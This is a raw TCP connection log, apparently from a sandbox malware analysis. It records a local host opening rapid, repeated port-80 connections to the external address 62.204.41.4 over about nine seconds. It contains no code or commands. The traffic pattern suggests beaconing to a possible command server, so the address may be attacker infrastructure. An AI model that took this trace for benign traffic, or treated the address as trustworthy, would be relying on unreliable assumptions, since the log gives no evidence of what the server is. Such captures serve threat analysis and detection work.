Feb 7, 2023 19:58:26.644428015 CET	80	49996	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.644536018 CET	49996	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.750168085 CET	49996	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.750844955 CET	49997	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.811052084 CET	80	49996	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.811142921 CET	49996	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.812084913 CET	80	49997	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.812212944 CET	49997	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.812665939 CET	49997	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.874069929 CET	80	49997	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.876950026 CET	80	49997	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.877120018 CET	49997	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.982299089 CET	49997	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.983828068 CET	49998	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.043879986 CET	80	49997	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.044028997 CET	49997	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.044200897 CET	80	49998	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.044292927 CET	49998	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.044687033 CET	49998	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.105133057 CET	80	49998	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.109872103 CET	80	49998	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.110039949 CET	49998	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.216324091 CET	49998	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.217258930 CET	49999	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.276776075 CET	80	49998	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.276990891 CET	49998	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.277617931 CET	80	49999	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.277739048 CET	49999	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.278095961 CET	49999	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.338417053 CET	80	49999	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.341284990 CET	80	49999	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.341471910 CET	49999	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.450234890 CET	49999	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.450972080 CET	50000	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.511581898 CET	80	49999	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.511888981 CET	49999	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.513262033 CET	80	50000	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.513511896 CET	50000	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.513822079 CET	50000	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.575335026 CET	80	50000	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.578027010 CET	80	50000	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.578190088 CET	50000	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.684348106 CET	50000	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.684988022 CET	50001	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.745915890 CET	80	50000	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.746181965 CET	50000	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.746397018 CET	80	50001	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.746519089 CET	50001	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.747122049 CET	50001	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.808638096 CET	80	50001	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.812407970 CET	80	50001	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.812588930 CET	50001	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.918818951 CET	50001	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.919858932 CET	50002	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.979475975 CET	80	50002	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.980427980 CET	80	50001	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:27.980529070 CET	50002	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.980529070 CET	50002	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:27.980768919 CET	50001	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.040287018 CET	80	50002	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.043360949 CET	80	50002	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.043539047 CET	50002	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.194216013 CET	50002	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.195435047 CET	50003	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.254009008 CET	80	50002	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.254220009 CET	50002	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.256889105 CET	80	50003	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.257025003 CET	50003	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.269253016 CET	50003	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.330905914 CET	80	50003	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.335577965 CET	80	50003	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.335688114 CET	50003	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.451808929 CET	50003	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.452635050 CET	50004	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.513570070 CET	80	50003	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.513767958 CET	50003	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.515491009 CET	80	50004	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.515651941 CET	50004	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.516742945 CET	50004	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.579231024 CET	80	50004	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.581959963 CET	80	50004	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.582597017 CET	50004	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.690196037 CET	50004	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.690835953 CET	50005	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.752639055 CET	80	50004	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.752830029 CET	50004	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.753161907 CET	80	50005	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.753308058 CET	50005	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.753873110 CET	50005	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.816355944 CET	80	50005	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.819713116 CET	80	50005	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:28.821311951 CET	50005	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.941597939 CET	50005	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:28.942292929 CET	50006	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.003590107 CET	80	50006	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.003917933 CET	80	50005	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.007683992 CET	50005	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.007689953 CET	50006	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.008274078 CET	50006	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.069582939 CET	80	50006	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.073539019 CET	80	50006	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.074781895 CET	50006	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.218852997 CET	50006	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.219624043 CET	50007	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.284248114 CET	80	50006	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.284295082 CET	80	50007	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.284418106 CET	50006	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.284455061 CET	50007	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.284925938 CET	50007	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.349370003 CET	80	50007	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.352976084 CET	80	50007	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.353063107 CET	50007	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.462913036 CET	50007	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.463641882 CET	50008	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.525739908 CET	80	50007	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.526956081 CET	80	50008	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.530811071 CET	50007	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.530860901 CET	50008	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.531822920 CET	50008	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.592078924 CET	80	50008	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.594883919 CET	80	50008	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.599400997 CET	50008	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.730097055 CET	50008	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.730931044 CET	50009	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.790714979 CET	80	50008	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.793253899 CET	80	50009	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.796220064 CET	50008	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.796252012 CET	50009	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.797002077 CET	50009	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.859205961 CET	80	50009	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.861598015 CET	80	50009	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:29.864048958 CET	50009	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.984894037 CET	50009	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:29.985637903 CET	50010	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.047261953 CET	80	50009	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.047297001 CET	80	50010	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.047352076 CET	50009	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.047462940 CET	50010	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.047945976 CET	50010	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.109272957 CET	80	50010	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.113293886 CET	80	50010	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.113488913 CET	50010	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.222122908 CET	50010	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.223011017 CET	50011	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.283719063 CET	80	50010	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.284230947 CET	50010	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.285320997 CET	80	50011	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.289819956 CET	50011	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.290364027 CET	50011	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.352756977 CET	80	50011	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.354994059 CET	80	50011	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.361114025 CET	50011	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.488264084 CET	50011	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.488883018 CET	50012	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.550774097 CET	80	50011	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.550960064 CET	50011	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.551141024 CET	80	50012	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.553419113 CET	50012	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.553987026 CET	50012	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.616863012 CET	80	50012	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.620116949 CET	80	50012	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.623298883 CET	50012	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.756623030 CET	50012	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.757392883 CET	50013	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.818850040 CET	80	50013	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.818902969 CET	80	50012	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.819444895 CET	50012	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.819473028 CET	50013	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.820174932 CET	50013	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:30.881613016 CET	80	50013	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.884478092 CET	80	50013	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:30.891199112 CET	50013	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.000611067 CET	50013	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.001497984 CET	50014	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.061903954 CET	80	50014	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.062063932 CET	80	50013	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.062237024 CET	50013	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.062716961 CET	50014	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.062716961 CET	50014	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.123994112 CET	80	50014	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.127194881 CET	80	50014	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.133569002 CET	50014	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.241182089 CET	50014	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.242037058 CET	50015	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.301763058 CET	80	50014	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.304316998 CET	80	50015	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.306633949 CET	50014	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.306669950 CET	50015	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.307259083 CET	50015	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.370913029 CET	80	50015	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.373688936 CET	80	50015	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.376017094 CET	50015	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.481854916 CET	50015	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.482775927 CET	50016	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.544461966 CET	80	50016	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.544487000 CET	80	50015	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.544614077 CET	50015	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.544754028 CET	50016	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.545049906 CET	50016	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.608040094 CET	80	50016	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.610845089 CET	80	50016	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.624417067 CET	50016	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.727992058 CET	50016	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.729451895 CET	50017	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.789983034 CET	80	50016	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.790785074 CET	50016	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.793286085 CET	80	50017	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.793534040 CET	50017	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.793987036 CET	50017	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.856520891 CET	80	50017	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.859750986 CET	80	50017	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:31.859894037 CET	50017	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.981981039 CET	50017	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:31.983503103 CET	50018	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.044691086 CET	80	50017	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.045342922 CET	80	50018	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.050448895 CET	50017	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.050513029 CET	50018	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.051728010 CET	50018	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.113764048 CET	80	50018	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.118958950 CET	80	50018	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.119077921 CET	50018	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.229906082 CET	50018	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.230838060 CET	50019	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.291600943 CET	80	50018	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.291939020 CET	50018	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.292146921 CET	80	50019	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.292311907 CET	50019	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.292788982 CET	50019	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.354048967 CET	80	50019	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.357552052 CET	80	50019	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.359565020 CET	50019	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.483907938 CET	50019	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.485155106 CET	50020	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.545456886 CET	80	50019	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.545624971 CET	50019	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.546431065 CET	80	50020	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.556659937 CET	50020	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.557219028 CET	50020	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.619204044 CET	80	50020	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.622184992 CET	80	50020	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.627775908 CET	50020	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.731333971 CET	50020	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.732286930 CET	50021	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.793207884 CET	80	50020	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.793456078 CET	50020	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.794234037 CET	80	50021	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.794342041 CET	50021	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.794729948 CET	50021	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.856276035 CET	80	50021	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.859031916 CET	80	50021	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:32.861385107 CET	50021	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.985166073 CET	50021	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:32.986020088 CET	50022	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.046363115 CET	80	50022	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.046751022 CET	80	50021	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.046771049 CET	50022	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.046832085 CET	50021	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.047755003 CET	50022	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.108263969 CET	80	50022	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.112380028 CET	80	50022	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.112684965 CET	50022	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.217859030 CET	50022	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.218647003 CET	50023	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.278232098 CET	80	50022	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.278429985 CET	50022	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.280174971 CET	80	50023	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.280271053 CET	50023	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.280642033 CET	50023	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.342320919 CET	80	50023	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.345523119 CET	80	50023	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.345628977 CET	50023	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.457045078 CET	50023	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.457935095 CET	50024	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.517782927 CET	80	50024	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.518764973 CET	80	50023	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.532186985 CET	50023	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.533941984 CET	50024	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.541536093 CET	50024	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.601669073 CET	80	50024	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.603916883 CET	80	50024	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.604046106 CET	50024	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.711807966 CET	50024	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.712562084 CET	50025	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.771373987 CET	80	50024	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.773799896 CET	80	50025	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.785418034 CET	50024	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.785478115 CET	50025	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.797118902 CET	50025	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.858551025 CET	80	50025	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.861409903 CET	80	50025	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:33.861551046 CET	50025	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.971590996 CET	50025	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:33.980518103 CET	50026	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.033035040 CET	80	50025	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.033274889 CET	50025	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.041661024 CET	80	50026	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.055123091 CET	50026	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.056162119 CET	50026	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.116782904 CET	80	50026	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.120628119 CET	80	50026	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.120716095 CET	50026	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.225820065 CET	50026	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.226648092 CET	50027	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.286808968 CET	80	50026	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.286848068 CET	80	50027	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.302114010 CET	50026	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.302201033 CET	50027	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.302752972 CET	50027	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.362896919 CET	80	50027	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.365164995 CET	80	50027	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.371589899 CET	50027	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.487581015 CET	50027	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.488284111 CET	50028	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.548418999 CET	80	50027	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.548563957 CET	50027	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.550209999 CET	80	50028	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.553374052 CET	50028	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.553699017 CET	50028	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.615111113 CET	80	50028	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.617747068 CET	80	50028	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.618053913 CET	50028	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.742680073 CET	50028	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.743380070 CET	50029	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.804425955 CET	80	50028	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.805825949 CET	80	50029	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.809160948 CET	50028	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.809205055 CET	50029	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.809952974 CET	50029	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.872335911 CET	80	50029	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.874922037 CET	80	50029	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:34.875138044 CET	50029	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.993508101 CET	50029	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:34.994205952 CET	50030	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.056168079 CET	80	50029	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.056451082 CET	80	50030	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.057014942 CET	50029	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.057136059 CET	50030	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.059293985 CET	50030	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.121669054 CET	80	50030	62.204.41.4	192.168.2.5
